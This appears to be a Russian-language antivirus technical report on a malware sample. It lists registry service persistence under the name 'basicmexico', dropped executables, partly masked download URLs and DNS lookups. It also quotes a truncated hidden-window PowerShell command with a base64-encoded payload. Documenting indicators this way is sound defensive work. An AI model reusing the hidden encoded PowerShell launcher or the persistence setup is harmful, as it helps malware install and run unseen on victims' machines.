Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\basicmexico] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\basicmexico] 'ImagePath' = '"%WINDIR%\SysWOW64\basicmexico.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABXAHoAcAB0AGUAcABvAG4AcgA9ACcAQQB6AHIAaABsAHkAbQBwAHMAJwA7ACQAUgBvAGgAdgBtAHoAbgBxAHAAbAAgAD0AIAAnADEANgAwACcAOwAkAEIAaAByAHgAbwBpAGQAZABpAHUAYwA9ACcAWgBrAGsAaABwAGQAdQBzACcAOwA...
- %HOMEPATH%\160.exe
- %HOMEPATH%\160.exe в %WINDIR%\syswow64\basicmexico.exe
- http://sa####patil.online/wp-includes/rBhbqf/
- http://15#.#83.25.24/UuvUzCm
- DNS ASK sa####patil.online
- '%HOMEPATH%\160.exe'
- '%WINDIR%\syswow64\basicmexico.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABXAHoAcAB0AGUAcABvAG4AcgA9ACcAQQB6AHIAaABsAHkAbQBwAHMAJwA7ACQAUgBvAGgAdgBtAHoAbgBxAHAAbAAgAD0AIAAnADEANgAwACcAOwAkAEIAaAByAHgAbwBpAGQAZABpAHUAYwA9ACcAWgBrAGsAaABwAGQAdQBzACcAOwA...' (со скрытым окном)